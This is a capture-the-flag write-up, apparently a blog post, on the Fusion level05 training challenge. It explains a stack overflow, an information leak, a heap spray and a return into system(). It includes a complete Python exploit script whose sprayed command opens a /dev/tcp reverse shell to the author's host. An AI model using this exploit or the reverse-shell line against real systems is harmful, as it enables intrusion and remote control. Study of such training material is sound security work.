exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues. The exercise talked about in this blog post can be found here:
https://exploit-exercises.com/fusion/level05/
I am writing this blog post because I could not find a solution similar to mine anywhere online. Hopefully, by sharing my method and techniques, I can enrich others’ knowledge and methodology.
The Problem
In this exercise we face a web server compiled with several protection mechanisms, and we expect the vulnerability to be stack based.
To bypass these protection mechanisms and obtain some kind of shell, we’ll have to:
- Find an information leak in order to bypass the different ASLR protections
- Obtain a write capability to place something to execute in memory, either shellcode or a command string
- Obtain execution capabilities
Intro
The method I used to solve this exercise covers heap spraying and stack overflowing. The overflow is used both to control EIP and to change only the saved values on the stack, which changes the behavior of the program for our benefit. Changing only those saved values provides the ability to read (almost) any address. With that in mind, let’s dive in.
The code begins with the server listening on port 20005 and an internal task creation mechanism that creates a childtask() for each new connection received. It is important to mention that, unlike previous exercises, the code in the main() function doesn’t fork(). Therefore, if we crash the program it’s “game over”: we won’t be able to communicate with the server anymore and will have to restart the program. A side effect of restarting the program is that the addresses are randomized again, so we have to find an information leak without crashing the program. An information leak is some kind of information disclosure that helps us bypass the ASLR protection.
The real logic begins in the function childtask(), where there are 5 known commands you can send to the application: “addreg”, “senddb”, “checkname”, “quit” and “isup”.
The only functions I will use for the exploit are checkname() and isup().
Obtaining Read Capabilities
Let’s observe the function checkname():

static void checkname(void *arg)
{
    struct isuparg *isa = (struct isuparg *)(arg);
    int h;

    h = get_and_hash(32, isa->string, '@');
    fdprintf(isa->fd, "%s is %sindexed already\n", isa->string,
             registrations[h].ipv4 ? "" : "not ");
}
And the function it calls, get_and_hash():

int get_and_hash(int maxsz, char *string, char separator)
{
    char name[32];
    int i;

    if(maxsz > 32) return 0;

    for(i = 0; i < maxsz, string[i]; i++) {
        if(string[i] == separator) break;
        name[i] = string[i];
    }

    return hash(name, strlen(name), 0x7f);
}
In get_and_hash(), it appears the author implemented his own kind of strcpy(), which stops copying either on a null terminator or when it reaches the separator value, which is @ (0x40). It has no effective string length limitation: the loop condition i < maxsz, string[i] uses the comma operator, which discards the result of i < maxsz, so only string[i] decides when the loop ends. This is where the magic begins.
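To make the effect of that loop condition concrete, here is a small Python model of the copy loop. It is only a sketch of the behavior described above, not the server code; the function name copy_like_get_and_hash and the sample request are made up for illustration.

```python
NAME_SIZE = 32  # size of `char name[32]` in get_and_hash()


def copy_like_get_and_hash(data: bytes, separator: bytes = b"@") -> bytes:
    """Model of the C copy loop: it stops only at a NUL byte or the separator."""
    copied = bytearray()
    for byte in data:
        # In C, `i < maxsz, string[i]` evaluates to `string[i]` alone,
        # so the length check never terminates the loop.
        if byte == 0:
            break
        if byte == separator[0]:
            break
        copied.append(byte)
    return bytes(copied)


# Hypothetical request: 100 filler bytes followed by the separator.
request = b"A" * 100 + b"@ignored"
copied = copy_like_get_and_hash(request)
overflow = len(copied) - NAME_SIZE  # bytes written past the end of name[]
```

In this model 100 bytes are copied into a 32 byte buffer, so 68 bytes land on whatever sits above name[] on the stack.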
We can send a string of (almost) 512 bytes to the childtask() function. This function passes a duplicated string to checkname(), which passes it on to get_and_hash(), where the buffer overflow occurs. Let’s examine the get_and_hash() prologue and epilogue to better understand the benefits and possible effects of the overflow.
Notice the registers ESI, EDI and EBP. When we overflow the stack, we first fill the space reserved for the buffer char name[32]; but after that buffer there are also the three registers that were pushed on the stack in the prologue, which we can overwrite as well. They are restored in the epilogue of the function with whatever new data I provide (after the overflow has occurred). Let’s see if these saved values can benefit us somehow in the calling function checkname(). Here is an assembly screenshot of how it looks, with additional comments of mine:
Let’s see if the registers we can overwrite, ESI, EDI and EBP, have any meaning in this function.
It seems that EDI is expected to hold the string, and ESI the file descriptor (FD). This is great; a pseudo call to the fdprintf() function would look like this:
fdprintf(ESI, "%s is %sindexed already\n", EDI, registrations[h].ipv4 ? "" : "not ");
After a short dynamic examination, I noticed that the file descriptor always had the same value of 4. As for the string, if I manage to provide any readable address, its contents will be printed. In theory I can repeat this for all of memory: I will be able to find the address of libc and then the address of system(), which will easily let me execute any command (a little spoiler: later on, my reverse shell). So right now I almost have the ability to read any address; however, providing an invalid address to the fdprintf() function will cause the program to crash. I don’t know any valid existing address, so what should I do?
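The read primitive can be sketched as a request builder. The layout (32 filler bytes, then the saved ESI and EDI values) and the list of bytes that cannot be sent follow the exploit script later in this post; the function name build_leak_request is my own, and the sketch uses Python 3 bytes rather than the Python 2 strings of the original script.

```python
import struct

NAME_SIZE = 32                   # char name[32] in get_and_hash()
BAD_BYTES = b"\x00\x0a\x0d\x40"  # NUL, LF, CR and '@' cut the copy short


def build_leak_request(fd_ptr: int, read_addr: int) -> bytes:
    """Build a checkname request that overwrites the saved ESI and EDI.

    fd_ptr    -> value restored into ESI (used for the FD)
    read_addr -> value restored into EDI (the string fdprintf() will print)
    """
    saved_regs = struct.pack("<II", fd_ptr, read_addr)
    if any(b in BAD_BYTES for b in saved_regs):
        raise ValueError("address contains a byte the copy loop cannot carry")
    return b"checkname " + b"A" * NAME_SIZE + saved_regs + b"\r\n"


# The two guessed constants used by the script in this post.
request = build_leak_request(0xbc111150, 0xbd11b162)
```

Rejecting bad bytes up front matters here because a truncated overwrite would restore a half-controlled pointer, and a wild read crashes the single server process.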
Heap Spray
In order to obtain a valid address to read from, we will have to create it. I noticed the addresses are more or less the same every time I restarted the program:
Start Addr   End Addr     Size       Offset     objfile
0xb755f000   0xb75a1000   0x42000    0
0xb75a1000   0xb7717000   0x176000   0          /lib/i386-linux-gnu/libc-2.13.so
0xb7717000   0xb7719000   0x2000     0x176000   /lib/i386-linux-gnu/libc-2.13.so
0xb7719000   0xb771a000   0x1000     0x178000   /lib/i386-linux-gnu/libc-2.13.so
0xb771a000   0xb771d000   0x3000     0
0xb7727000   0xb7729000   0x2000     0
0xb7729000   0xb772a000   0x1000     0          [vdso]
0xb772a000   0xb7748000   0x1e000    0          /lib/i386-linux-gnu/ld-2.13.so
0xb7748000   0xb7749000   0x1000     0x1d000    /lib/i386-linux-gnu/ld-2.13.so
0xb7749000   0xb774a000   0x1000     0x1e000    /lib/i386-linux-gnu/ld-2.13.so
0xb774a000   0xb7750000   0x6000     0          /opt/fusion/bin/level05
0xb7750000   0xb7751000   0x1000     0x6000     /opt/fusion/bin/level05
0xb7751000   0xb7754000   0x3000     0
0xb8977000   0xb8998000   0x21000    0          [heap]
0xbff36000   0xbff57000   0x21000    0          [stack]
The lowest loaded library always starts somewhere around 0xB6000000 to 0xB9000000, and so does the beginning of the heap, which lies somewhere between the last loaded library and the stack. Anything mapped must sit below 0xC0000000. Therefore, if I can allocate enough data on the heap, increasing its size, I can safely guess an address that will surely be readable. Any address between 0xbd000000 and 0xbe000000 will surely be mine if I allocate and write enough data on the heap. So how can I do that?
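As a rough check of that reasoning, the sketch below takes the [heap] and [stack] rows from the mapping listing above and computes how much room the heap has to grow, and how far it must grow to cover the 0xbd000000 to 0xbe000000 window. The helper parse_maps is hypothetical, and the numbers come from one run only, so they shift with every restart.

```python
# Two rows copied from the mapping listing above (one particular run).
MAPS = """\
0xb8977000 0xb8998000 0x21000 0 [heap]
0xbff36000 0xbff57000 0x21000 0 [stack]
"""


def parse_maps(text):
    """Return {objfile: (start, end)} for rows that name an objfile."""
    regions = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) == 5:
            regions[fields[4]] = (int(fields[0], 16), int(fields[1], 16))
    return regions


regions = parse_maps(MAPS)
heap_end = regions["[heap]"][1]
stack_start = regions["[stack]"][0]

# Space the heap can grow into before it runs into the stack.
room = stack_start - heap_end

# Bytes the heap must grow by to cover the whole guessed window.
target_low, target_high = 0xbd000000, 0xbe000000
needed = target_high - heap_end
```

For this run the heap has 0x759e000 bytes of room and needs to grow by 0x5668000 bytes, so the guessed window fits with space to spare.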
Examine the call to the function isup():

if(strncmp(buffer, "isup ", 5) == 0) {
    struct isuparg *isa = calloc(sizeof(struct isuparg), 1);

    isa->fd = cfd;
    isa->string = strdup(buffer + 5);
    taskcreate(isup, isa, STACK);
}
There is a call to strdup(), which duplicates a string in memory:
DESCRIPTION
The strdup() function returns a pointer to a new string which is a duplicate of the string s. Memory for the new string is obtained with malloc(3), and can be freed with free(3).
But there is no subsequent call to free(), which means the buffer is never released from the heap. If we trigger the strdup() call plenty of times (more specifically, around 0x20000 times) with a long string, we can essentially predict an address on the heap that will contain our data.
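A single spray request can be sketched like this. The command string, the 0x30 bytes of padding and the trailing FD value mirror the spray() function of the script later in the post; build_spray_request and what_strdup_keeps are illustrative names, and the second one only models the fact that strdup() stops at the first NUL byte.

```python
import struct

COMMAND = b"A /bin/sh > /dev/tcp/192.168.164.1/1337 0>&1 2>&1; "


def build_spray_request(command: bytes = COMMAND, padding: int = 0x30,
                        fd: int = 4) -> bytes:
    """One "isup" line: command, filler, then the FD value as a 32-bit word."""
    body = command + b"A" * padding + struct.pack("<I", fd)
    return b"isup " + body + b"\r\n"


def what_strdup_keeps(request: bytes) -> bytes:
    """Model of strdup(buffer + 5): copy up to, not including, the first NUL."""
    return request[5:].split(b"\x00", 1)[0]


kept = what_strdup_keeps(build_spray_request())
```

Only the low byte of the packed FD survives the copy, which is why the script later searches the leaked data for eight "A" characters followed by \x04.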
Start Addr   End Addr     Size        Offset     objfile
0xb755f000   0xb75a1000   0x42000     0
0xb75a1000   0xb7717000   0x176000    0          /lib/i386-linux-gnu/libc-2.13.so
0xb7717000   0xb7719000   0x2000      0x176000   /lib/i386-linux-gnu/libc-2.13.so
0xb7719000   0xb771a000   0x1000      0x178000   /lib/i386-linux-gnu/libc-2.13.so
0xb771a000   0xb771d000   0x3000      0
0xb7727000   0xb7729000   0x2000      0
0xb7729000   0xb772a000   0x1000      0          [vdso]
0xb772a000   0xb7748000   0x1e000     0          /lib/i386-linux-gnu/ld-2.13.so
0xb7748000   0xb7749000   0x1000      0x1d000    /lib/i386-linux-gnu/ld-2.13.so
0xb7749000   0xb774a000   0x1000      0x1e000    /lib/i386-linux-gnu/ld-2.13.so
0xb774a000   0xb7750000   0x6000      0          /opt/fusion/bin/level05
0xb7750000   0xb7751000   0x1000      0x6000     /opt/fusion/bin/level05
0xb7751000   0xb7754000   0x3000      0
0xb8977000   0xb8998000   0x21000     0          [heap]
0xb8998000   0xbff2a000   0x7592000   0          [heap]
0xbff36000   0xbff57000   0x21000     0          [stack]
Above you can see an example of the heap after spraying. Notice the new heap region and its size. The string I sprayed includes the file descriptor, which is always 4, and the string I want to execute for a reverse shell. It is very important to tune the spray for every different string length, because it has to be aligned perfectly to 0x100 bytes. That way, for every possible address of the form 0x______XY, where X and Y are fixed, the same value will be found at that address (thanks to the spray).
The next step is to use the read capability I explained earlier to read the buffer allocated on the heap and walk backwards(!) until the buffer is no longer there, which marks the point just before the spray began. This is done quite easily with a guessed address for my expected string, as well as an address for the FD. Each iteration decreases the address by 0x100 until we no longer see the expected buffer; this is “ground zero”, where the spray began. At this point I have a pointer to the very first allocated string. Relative to that address I found a pointer to the isup() function, probably left there by the internal taskcreate() mechanism, which doesn’t properly free its memory either. After reading this pointer as well, it’s pretty much over and I am on the way to successfully bypassing the ASLR mechanism.
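The backward walk can be sketched against a simulated leak function. The 0x100 stride, the limit of 0x10 consecutive misses and the list of unsendable bytes are taken from the script later in the post; the simulated spray bounds, the marker and the names walk_back and fake_leak are assumptions for illustration only. On the real target each miss is a read of live memory, so the walk is only safe while the addresses stay mapped.

```python
STRIDE = 0x100                       # spacing between sprayed copies
BAD_BYTES = {0x00, 0x0a, 0x0d, 0x40}  # bytes that cannot be sent in an address
MARKER = b"/bin/sh > /dev/tcp/"


def has_bad_byte(addr: int) -> bool:
    return any(b in BAD_BYTES for b in addr.to_bytes(4, "little"))


def walk_back(start: int, leak, marker: bytes = MARKER, max_misses: int = 0x10):
    """Step down by STRIDE; return the lowest address that still leaked the marker."""
    addr, last_hit, misses = start, None, 0
    while misses < max_misses and addr > 0:
        if not has_bad_byte(addr):      # unsendable addresses are skipped
            if marker in leak(addr):
                last_hit, misses = addr, 0
            else:
                misses += 1
        addr -= STRIDE
    return last_hit


# Simulated target: the spray covers this made-up address range.
SPRAY_LOW, SPRAY_HIGH = 0xbd0ff000, 0xbd120000


def fake_leak(addr: int) -> bytes:
    return MARKER + b"..." if SPRAY_LOW <= addr < SPRAY_HIGH else b""


ground_zero = walk_back(0xbd11b162, fake_leak)
```

With these simulated bounds the walk settles on 0xbd0ff062, the lowest sendable address in the sprayed range that shares the low byte 0x62 with the starting guess.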
Here is a picture showing the end of the buffer I sprayed, as well as the address of the isup() function, which always resides right next to my buffer.
At this point it becomes quite easy to find the address of system(). Using the same technique to read the heap with the fdprintf() call we control, just provide the address of the isup() pointer. That gives me an address inside the main binary level05, from which I can read any relative address, so a function pointer in the GOT will do, for example write(), which lives in the libc library. From there I can obtain the address of system() by its relative offset. In short, it goes like this:
Heap -> isup (level05) -> write (level05) -> write (libc) -> system (libc)
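The arithmetic behind that chain is short. The two offsets below are the ones hard-coded in the script later in the post and are specific to this level05 binary and libc-2.13; the helper names and the example addresses are made up.

```python
import struct

ISUP_TO_WRITE_GOT = 0x41e8   # isup() -> GOT slot of write(), from the script
WRITE_TO_SYSTEM = -0x847a0   # write() -> system() inside libc, from the script


def decode_pointer(leaked: bytes) -> int:
    """First four leaked bytes as a little-endian 32-bit pointer.

    The leak goes through "%s", so a pointer containing a NUL byte
    would arrive truncated and decode incorrectly.
    """
    return struct.unpack("<I", leaked[:4])[0]


def write_got_entry(isup_addr: int) -> int:
    return isup_addr + ISUP_TO_WRITE_GOT


def system_address(write_addr: int) -> int:
    return write_addr + WRITE_TO_SYSTEM


# Hypothetical leaked values, just to exercise the arithmetic.
isup_addr = decode_pointer(b"\x10\xc0\x74\xb7 is not indexed already")
got_slot = write_got_entry(isup_addr)
system_addr = system_address(0xb7665000)
```

Each arrow in the chain above is one more leak request: the first returns isup(), the second reads the GOT slot computed from it, and the last step is pure subtraction.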
Now that I have the address of system(), I need a command that will give me a remote shell. I chose to spray the string /bin/sh > /dev/tcp/192.168.164.1/1337 0>&1 2>&1, where my host IP is 192.168.164.1 and the port I listen on is 1337. I already know how to spray, and I now know I can spray a nice command for a reverse shell. To execute system() with it, I overflow through checkname() further, overwriting EBP, which we no longer care about, and providing a new return address, which will be system(). Don’t forget to also provide the address of the argument we sprayed on the heap in order to obtain the reverse shell.
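The final overflow can be sketched the same way as the leak request, with three more words after the saved registers. The layout follows exec_shell() in the script below; build_exec_request is an illustrative name, the system() address in the example is hypothetical, and the sketch uses Python 3 bytes.

```python
import struct

NAME_SIZE = 32  # char name[32] in get_and_hash()


def build_exec_request(fd_ptr: int, command_addr: int, system_addr: int) -> bytes:
    """checkname request that returns into system(command_addr)."""
    frame = struct.pack(
        "<6I",
        fd_ptr,        # saved ESI
        command_addr,  # saved EDI
        0x01020304,    # saved EBP, value no longer matters
        system_addr,   # return address -> system()
        command_addr,  # return address seen by system() (unused)
        command_addr,  # argument to system(): the sprayed command
    )
    return b"checkname " + b"A" * NAME_SIZE + frame + b"\r\n"


# Guessed heap constants from the script; the system() address is made up.
request = build_exec_request(0xbc111150, 0xbd11b162, 0xb75e0860)
```

As with the leak request, every packed word has to be free of NUL, CR, LF and '@' bytes, or the copy stops before the return address is overwritten.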
The code exploiting the level (written in Python 2):

# Imports
import sys
import socket
import struct
import time
import binascii

# Definitions
REMOTE_MACHINE = "192.168.223.128"
REMOTE_PORT = 20005
RECV_SIZE = 1024

# Level constants
HEAP_FD_ADDRESS = 0xbc111150
START_ADDRESS = 0xBD11b162
BAD_ADDRESS_BYTES = ["00", "0A", "0D", "40"]
HEAP_OFFSET_SIZE = 0x100


def connect():
    s = socket.socket()
    s.connect((REMOTE_MACHINE, REMOTE_PORT))
    s.settimeout(0.15)
    return s


def spray():
    s = connect()
    spray_text = """A /bin/sh > /dev/tcp/192.168.164.1/1337 0>&1 2>&1; """ + "A" * (0x10 * 3) + struct.pack("I", 0x00000004)
    print " [*] Begin spray."
    for i in range(0x1a0000):
        s.send("isup %s\r\n" % spray_text)
        # The print is necessary for a REALLY minor delay, otherwise not all
        # s.send requests will be handled (causing the spray to fail).
        # It can be replaced with a short sleep() if the spray is not as expected.
        print "Spraying : [0x%08X]\r" % (i),


def obtain_write_addr():
    # Initializations
    addr = START_ADDRESS
    bin_addr = addr
    retrys = 0x10
    s = connect()

    # Welcome message
    dmsg = s.recv(RECV_SIZE)

    # Retry up to 0x10 times, which is also a page size with the offset we are changing
    # every time. I know for sure that I will have a "spare" buffer bigger than 0x1000
    # to read from without crashing the program, so it's fine.
    while 0 < retrys:
        # Validate that the address has no bad characters in it
        tmp = "%08X" % addr
        for letter in BAD_ADDRESS_BYTES:
            while letter in [(tmp[i] + tmp[i+1]) for i in range(0, 8, 2)]:
                # Debug print
                #print "\n [*] Bad address: [0x%08X] [%s]\n" % (addr, letter)
                addr -= HEAP_OFFSET_SIZE
                tmp = "%08X" % addr
                continue

        to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8)
        to_send += struct.pack("I", HEAP_FD_ADDRESS)  # ESI - FD
        to_send += struct.pack("I", addr)             # EDI - Address
        to_send += "\r\n"
        s.send(to_send)

        data = ""
        try:
            data = s.recv(1024)  #s.recv(100)
            data = data.replace("\n", "").replace("\r", "")
        except socket.timeout:
            # Rare timeout cases handling
            time.sleep(0.15)

        # Debug print
        print " [*] Current address with [%s...] : [0x%08X] [%s]\r" % (data[:10], addr, binascii.hexlify(data)[:16]),

        if -1 == data.find("/bin/sh > /dev/tcp/192.168.164.1") and -1 == data.find("A" * 8 + "\x04"):
            retrys -= 1
            # Rare cases where the heap misbehaves by 0x20 bytes, though it works that way
            addr = addr & 0xFFFFFF00
            if 0 == retrys % 2:
                addr += 0x82
            else:
                addr += 0x62
            # Debug prints
            #print "\n\t retrys: [%d]" % (retrys),
            #print "%s" % data[:30]
        else:
            retrys = 0x10
            bin_addr = addr

        addr -= HEAP_OFFSET_SIZE

    ##########################################################################
    # After following all of the heap structure with my spray, I'm expecting #
    # the last one to have a struct at a specific offset                     #
    ##########################################################################
    # Just a pointer to isup
    isup = ((bin_addr & 0xFFFFFF00) - 0x100 + 0xbc)

    # Obtain real isup() address
    to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8)
    to_send += struct.pack("I", HEAP_FD_ADDRESS)  # ESI - FD
    to_send += struct.pack("I", isup)             # EDI - Address
    to_send += "\r\n"
    s.send(to_send)
    data = s.recv(1024)  #s.recv(100)

    # isup() address at level05
    isup_hex = binascii.hexlify(data[:4][::-1])
    write_addr = int(isup_hex, 16) + 0x41e8
    print "\n"
    print "isup(): ", hex(int(isup_hex, 16))
    print "write(): ", hex(write_addr)

    to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8)
    to_send += struct.pack("I", HEAP_FD_ADDRESS)  # ESI - FD
    to_send += struct.pack("I", write_addr)       # EDI - Address
    to_send += "\r\n"
    s.send(to_send)
    data = s.recv(1024)  #s.recv(100)

    # write() address at level05
    write_hex = binascii.hexlify(data[:4][::-1])
    return int(write_hex, 16)


def exec_shell(system_addr):
    s = connect()
    to_send = "checkname %s" % (struct.pack("I", 0x41414141) * 8)
    to_send += struct.pack("I", HEAP_FD_ADDRESS)  # ESI - FD
    to_send += struct.pack("I", START_ADDRESS)    # EDI - Address
    to_send += struct.pack("I", 0x01020304)       # EBP - no longer needed
    to_send += struct.pack("I", system_addr)      # EIP - return into system()
    to_send += struct.pack("I", START_ADDRESS)    # Return address for system()
    to_send += struct.pack("I", START_ADDRESS)    # Argument: the sprayed command
    to_send += "\r\n"
    s.send(to_send)


def exploit():
    write_addr = obtain_write_addr()
    # Relative offset to system
    system_addr = write_addr - 0x847a0
    exec_shell(system_addr)
    print "[*] Done."


def level05():
    try:
        command = sys.argv[1]
    except IndexError:
        print "Usage: "
        print "script <command>"
        print "Available commands: [spray, run]"
        print "Use 'spray' prior to 'run'."
        return

    if "spray" == command:
        spray()
    elif "run" == command:
        exploit()
    else:
        print "Unknown command [%s]" % (command)
        print "Available commands: [spray, run]"


def main():
    level05()


if "__main__" == __name__:
    main()
To use the script, run it twice: once with the argument ‘spray’ and once with the argument ‘run’. The script includes things I didn’t go through in this post, such as bad addresses that can’t be sent because of the string limitations, and possible weird behavior of the heap. The code explains and handles these situations. It is also possible to make the exploit cleaner by changing the return address of system() to some clean exit that will not crash the program.
The hole could easily be closed if the program were compiled with stack cookie protection, which cannot be brute-forced without crashing the program, or if memory were handled properly with calls to free(), including in the internal implementation of the tasks, which also gave me an information disclosure on the heap.
Thanks for the tutorial! That was really helpful to me
How are you able to hard-code the “HEAP_FD_ADDRESS” value into your script? It changes each time the process is loaded into memory.
It was a couple of years ago, so I hope my memory won’t fail me here, but briefly looking at it: after you spray the heap enough times, you can accurately assume where everything is in memory (because you sprayed it).
This is why it’s a constant; it’s an educated guess of where the data I want will be after the heap spray.
I didn’t find any other info leak primitive that would give me an exact address.